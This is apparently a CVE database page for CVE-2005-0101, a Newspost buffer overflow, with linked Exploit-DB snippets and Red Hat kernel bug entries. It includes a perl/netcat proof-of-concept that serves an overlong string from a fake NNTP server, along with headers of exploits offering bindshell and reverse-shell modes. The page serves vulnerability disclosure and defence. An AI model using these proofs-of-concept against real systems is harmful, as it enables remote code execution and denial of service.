CVE-2005-0101
published 2005-02-01CVE-2005-0101: Buffer overflow in the socket_getline function in Newspost 2.1.1 and earlier allows remote malicious NNTP servers to execute arbitrary code via a long string…
PriorityP337high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
15.87%
96.5th percentile
Buffer overflow in the socket_getline function in Newspost 2.1.1 and earlier allows remote malicious NNTP servers to execute arbitrary code via a long string without a newline character.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| newspost | newspost | <= 2.1.1 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Tcpdump - bgp_update_print Remote Denial of Service
exploitdb·2005-06-09
CVE-2005-1267 Tcpdump - bgp_update_print Remote Denial of Service
Tcpdump - bgp_update_print Remote Denial of Service
---
/*
* 2005-05-31: Modified by [email protected] to test tcpdump infinite
* loop vulnerability.
*
* libnet 1.1
* Build a BGP4 update message with what you want as payload
*
* Copyright (c) 2003 Fr d ric Raynal
* All rights reserved.
*
* Examples:
*
* empty BGP UPDATE message:
*
* # ./bgp4_update -s 1.1.1.1 -d 2.2.2.2
* libnet 1.1 packet shaping: BGP4 update + payload[raw]
* Wrote 63 byte TCP packet; check the wire.
*
* 13:44:29.216135 1.1.1.1.26214 > 2.2.2.2.179: S [tcp sum ok]
* 16843009:16843032(23) win 32767: BGP (ttl 64, id 242, len 63)
* 0x0000 4500 003f 00f2 0000 4006 73c2 0101 0101 [email protected].....
* 0x0010 0202 0202 6666 00b3 0101 0101 0202 0202 ....ff..........
* 0x0020 5002 7fff b288 0000 0101 0101 0101 0101 P...............
Exploit-DB
Neslo Desktop Rover 3.0 - Malformed Packet Remote Denial of Service
exploitdb·2005-04-20
CVE-2005-1204 Neslo Desktop Rover 3.0 - Malformed Packet Remote Denial of Service
Neslo Desktop Rover 3.0 - Malformed Packet Remote Denial of Service
---
source: https://www.securityfocus.com/bid/13281/info
Neslo Desktop Rover is prone to a remote denial of service. Reports indicate that the software will crash when a malformed packet is processed on TCP port 61427.
A remote attacker may exploit this condition crash the software and effectively deny service for legitimate users.
20:23:48.778009 192.168.28.133.32771 > 192.168.28.129.61427: P [tcp sum ok]
1:13(12) ack 1 win 5840 (DF) (ttl 64, id 24051, len 64)
4500 0040 5df3 4000 4006 226e c0a8 1c85
c0a8 1c81 8003 eff3 90a8 d150 7cda 8afa
8018 16d0 daab 0000 0101 080a 0000 8cbe
0000 0000 6352 0100 0000 0000 0000 0000
Exploit-DB
Newspost 2.1 - 'socket_getline()' Remote Buffer Overflow (2)
exploitdb·2005-02-03
CVE-2005-0101 Newspost 2.1 - 'socket_getline()' Remote Buffer Overflow (2)
Newspost 2.1 - 'socket_getline()' Remote Buffer Overflow (2)
---
/*
* v0.2
* Newspost "socket_getline()" Buffer Overflow Exploit
* Exploit
* Bug discovered: 02/03/2005
*
* cybertronic[at]gmx[dot]net
*
* [ cybertronic @ newspost ] $ gcc -o newspost_expl newspost_expl.c
* [ cybertronic @ newspost ] $ ./newspost_expl cyber tronic
* Usage
* -----
* [ Bindshell ] ./newspost_expl
* [ Reverseshell ] ./newspost_expl [CONNECTBACK IP]
* [ cybertronic @ newspost ] $ ./newspost_expl
*
* __ __ _
* _______ __/ /_ ___ _____/ /__________ ____ (_)____
* / ___/ / / / __ \/ _ \/ ___/ __/ ___/ __ \/ __ \/ / ___/
* / /__/ /_/ / /_/ / __/ / / /_/ / / /_/ / / / / / /__
* \___/\__, /_.___/\___/_/ \__/_/ \____/_/ /_/_/\___/
* /____/
*
* --[ exploit by : cybertronic - cybertronic[at]gmx[dot]net
* --[ newspost-2.1
Exploit-DB
Newspost 2.0/2.1 - Remote Buffer Overflow
exploitdb·2005-02-01
CVE-2005-0101 Newspost 2.0/2.1 - Remote Buffer Overflow
Newspost 2.0/2.1 - Remote Buffer Overflow
---
source: https://www.securityfocus.com/bid/12418/info
Newspost is prone to a remote buffer overflow vulnerability due to an unbounded memory copy operation.
The problem occurs in the 'socket_getline()' function of 'socket.c' when the vulnerable client handles NNTP server responses.
Successful exploitation of this issue could potentially lead to arbitrary code execution.
This issue was reported to affect Newspost 2.1.1 and prior, however, other versions may be vulnerable.
Create a server:
perl -e 'print "A" x 1024;print "BBBBCCCCDDDDEEEE"'| nc -v -l -p 119
Connect to it:
newspost -s test -i localhost -f [email protected] -n news.news /etc/hosts
Bugzilla
CVE-2005-3106 exec_mmap race DoS
bugzilla·2005-10-10·CVSS 4.7
CVE-2005-3106 [MEDIUM] CVE-2005-3106 exec_mmap race DoS
CVE-2005-3106 exec_mmap race DoS
Race condition in Linux 2.6, when threads are sharing memory mapping via
CLONE_VM (such as linuxthreads and vfork), might allow local users to cause a
denial of service (deadlock) by triggering a core dump while waiting for a
thread that has just performed an exec.
Fixed upstream in 2.6.11:
http://linux.bkbits.net:8080/linux-2.6/cset@41e9a98dJKJjUrTCrKsyak1DOQxQug
Discussion:
An advisory has been issued which should help the problem
described in this bug report. This report is therefore being
closed with a resolution of ERRATA. For more information
on the solution and/or where to find the updated files,
please follow the link below. You may reopen this bug report
if the solution does not work for you.
http://rhn.redhat.com/errata/RHSA-2006-0101.html
Bugzilla
CVE-2005-3276 sys_get_thread_area minor info leak
bugzilla·2005-09-20·CVSS 2.1
CVE-2005-3276 [LOW] CVE-2005-3276 sys_get_thread_area minor info leak
CVE-2005-3276 sys_get_thread_area minor info leak
sys_get_thread_area does a copy_to_user on a partially unitialized structure,
which can leak a few random bits of information to userspace.
http://linux.bkbits.net:8080/linux-2.6/cset@42e81864gSEM90Oun0jA8dufpM3inw
Discussion:
An advisory has been issued which should help the problem
described in this bug report. This report is therefore being
closed with a resolution of ERRATA. For more information
on the solution and/or where to find the updated files,
please follow the link below. You may reopen this bug report
if the solution does not work for you.
http://rhn.redhat.com/errata/RHSA-2006-0101.html
Bugzilla
CVE-2005-3044 lost fput and sockfd_put could lead to DoS
bugzilla·2005-09-19·CVSS 2.1
CVE-2005-3044 [LOW] CVE-2005-3044 lost fput and sockfd_put could lead to DoS
CVE-2005-3044 lost fput and sockfd_put could lead to DoS
patch is obviously correct and should be applied even if there had been
no security implications.
Discussion:
An advisory has been issued which should help the problem
described in this bug report. This report is therefore being
closed with a resolution of ERRATA. For more information
on the solution and/or where to find the updated files,
please follow the link below. You may reopen this bug report
if the solution does not work for you.
http://rhn.redhat.com/errata/RHSA-2006-0101.html
---
SWsoft Virtuozzo/OpenVZ Linux kernel team would like to note that CVE-2005-3044
is still not fully fixed in RHEL4 kernel 2.6.9-42.0.8
Please see the for details:
https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=227978
---
for historical
http://marc.info/?l=bugtraq&m=110746336728781&w=2http://people.freebsd.org/~niels/issues/newspost-20050114.txthttp://secunia.com/advisories/14092/http://secunia.com/advisories/14098http://security.gentoo.org/glsa/glsa-200502-05.xmlhttp://securitytracker.com/id?1013056http://www.securityfocus.com/bid/12418http://www.vuxml.org/freebsd/7f13607b-6948-11d9-8937-00065be4b5b6.htmlhttps://exchange.xforce.ibmcloud.com/vulnerabilities/19178http://marc.info/?l=bugtraq&m=110746336728781&w=2http://people.freebsd.org/~niels/issues/newspost-20050114.txthttp://secunia.com/advisories/14092/http://secunia.com/advisories/14098http://security.gentoo.org/glsa/glsa-200502-05.xmlhttp://securitytracker.com/id?1013056http://www.securityfocus.com/bid/12418http://www.vuxml.org/freebsd/7f13607b-6948-11d9-8937-00065be4b5b6.htmlhttps://exchange.xforce.ibmcloud.com/vulnerabilities/19178
2005-02-01
Published